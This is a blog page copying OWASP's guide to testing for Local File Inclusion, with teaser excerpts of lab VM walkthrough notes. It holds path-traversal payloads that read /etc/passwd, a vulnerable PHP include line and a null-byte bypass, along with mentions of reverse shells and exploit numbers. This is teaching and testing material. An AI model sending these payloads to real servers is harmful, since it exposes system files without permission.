Skip to main content

Testing for Local File Inclusion LFI

How to Test

Since LFI occurs when paths passed to "include" statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters.

Consider the following example:
http://vulnerable_host/preview.php?file=example.html

This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

Typical proof-of-concept would be to load passwd file:
http://vulnerable_host/preview.php?file=../../../../etc/passwd

If the above mentioned conditions are met, an attacker would see something like the following:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alex:x:500:500:alex:/home/alex:/bin/bash
margo:x:501:501::/home/margo:/bin/bash
...

Very often, even when such vulnerability exists, its exploitation is a bit more complex. Consider the following piece of code:
<?php “include/”.include($_GET['filename'].“.php”); ?>

In the case, simple substitution with arbitrary filename would not work as the postfix 'php' is appended. In order to bypass it, a technique with null-byte terminators is used. Since  effectively presents the end of the string, any characters after this special byte will be ignored. Thus, the following request will also return an attacker list of basic users attributes:
http://vulnerable_host/preview.php?file=../../../../etc/passwd
http://vulnerable_host/preview.php?file=../../../../etc/passwdjpg

source : https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Comments

Post a Comment

Popular posts from this blog

28 VM SecOS-1

Walkthru: Notes: A. https://c0d3g33k.blogspot.com/2017/01/secos.html [capture admin cookie using 127.0.0.1 in a code  test.html  with cross site scripting vulnerability,  CSRF attack, use exploit 37088 for priv escalation ] B. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [ Hacking Node.js and MangoDB   ] c. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [use wget to post data from CLI. Add other cmds to ping cmd using curl and wget] D. https://chousensha.github.io/blog/2015/02/04/pentest-lab-secos/ [SSH tunnel so we can access the ping site from Kali and dont have to pass via CLI] Notes: # Nmap 7.70 scan initiated Thu Jul 19 09:26:05 2018 as: nmap -sV -O -oN ../reports/192.168.117.6/192.168.117.6.nmap 192.168.117.6 Nmap scan report for 192.168.117.6 Host is up (0.00042s latency). Not shown: 998 closed ports PORT     STATE SERVICE VERSION 22/tcp   open  ssh  ...
1 comment
Read more

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...
1 comment
Read more

VM 15: Kioptix 2014

Walkthru Notes 2nd approach  using nc via web using php reverse shell 3rd approach   w/o metasploit =================== walkthru: 1.  Updating OpenFuck Exploit(764) but it didnt work here @ https://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ 2. ============== Notes: 80/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox virtual NIC) Running: FreeBSD 9.X|10.X OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10 OS details: FreeBSD 9.0-RELEASE - 10.3-RELEASE PORT     STATE SERVICE VERSION 8080/tcp open  http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) |_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 |_http-title: 403 Forbidden MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox...
Post a Comment
Read more